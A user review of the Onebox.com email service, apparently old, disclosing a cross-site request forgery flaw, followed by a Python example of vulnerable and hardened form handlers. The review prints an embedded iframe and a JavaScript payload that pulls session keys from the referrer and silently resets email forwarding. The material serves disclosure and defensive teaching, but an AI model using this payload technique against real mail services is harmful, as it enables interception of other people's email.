Onebox.com provides an email service which allows execution of JavaScript code and also allows access to any of its CGIs. I cut and pasted the source HTML of the "Forwarding and Notification" page into my free website and embedded the following code into an email:
<iframe src='http://www.anzwers.org/free/email/onebox.html' />
This exploit resulted in all of my e-mail being forwarded to another address. This is not good. The main problem here is that Onebox.com does not check the path of the pages calling their CGIs. Admittedly the source HTML code needed a few minor mods to establish the key value of the login session by means of the document.referrer object and a JavaScript split string function, followed by some dynamic HTML, i.e.
<script>
df=document.referrer;
s=df.split('msg?');
s=s[0];
key=df.split('=');
document.write('<form method=post action="'+s);
document.write('/options?u='+key[3]+'&r='+key[4]+'" name=TheForm>');
</script>
On a positive note, the service is very easy to use and if you don't mind your email being open to the world, it would make a fine junk-mail account. Onebox also requires entry of current passwords before changes to critical settings are allowed, so that is also a plus. Use this service at your own risk.
Recommended: No
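The missing check the review describes, as an added example that is neither the reviewer's code nor Onebox's CGI: a toy handler for the options form that accepts the u/r values from the URL alone (any page that learns them can submit), beside one that also demands a per-session anti-CSRF token and rejects a cross-site Referer. The parameter names, session store and host are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed session store: u/r mirror the query parameters seen in the
# review's form action; csrf is a per-session secret never placed in a URL.
SESSIONS = {
    "u123": {"r": "abc", "forward_to": None, "csrf": secrets.token_hex(16)},
}

SITE_HOST = "onebox.com"  # assumed host of the service's own pages


def _session_for(params):
    """Look up the session named by u and confirm r matches (shared by both handlers)."""
    s = SESSIONS.get(params.get("u"))
    if s is None or s["r"] != params.get("r"):
        return None
    return s


def vulnerable_options(params):
    """Trusts u/r from the query string alone, so a form posted from any
    origin that knows them changes the forwarding address."""
    s = _session_for(params)
    if s is None:
        return 403
    s["forward_to"] = params.get("forward_to")
    return 200


def hardened_options(params, headers):
    """Same handler with two extra checks: a token tied to the session that a
    foreign page cannot read or derive from the referrer, and a Referer/Origin
    check that rejects submissions carrying another site's address."""
    s = _session_for(params)
    if s is None:
        return 403
    # constant-time compare so the token check does not leak by timing
    if not hmac.compare_digest(params.get("csrf", ""), s["csrf"]):
        return 403
    origin = headers.get("Origin") or headers.get("Referer") or ""
    # if a source is given, it must be this site (the token is still the primary control)
    if origin and urlparse(origin).netloc != SITE_HOST:
        return 403
    s["forward_to"] = params.get("forward_to")
    return 200
```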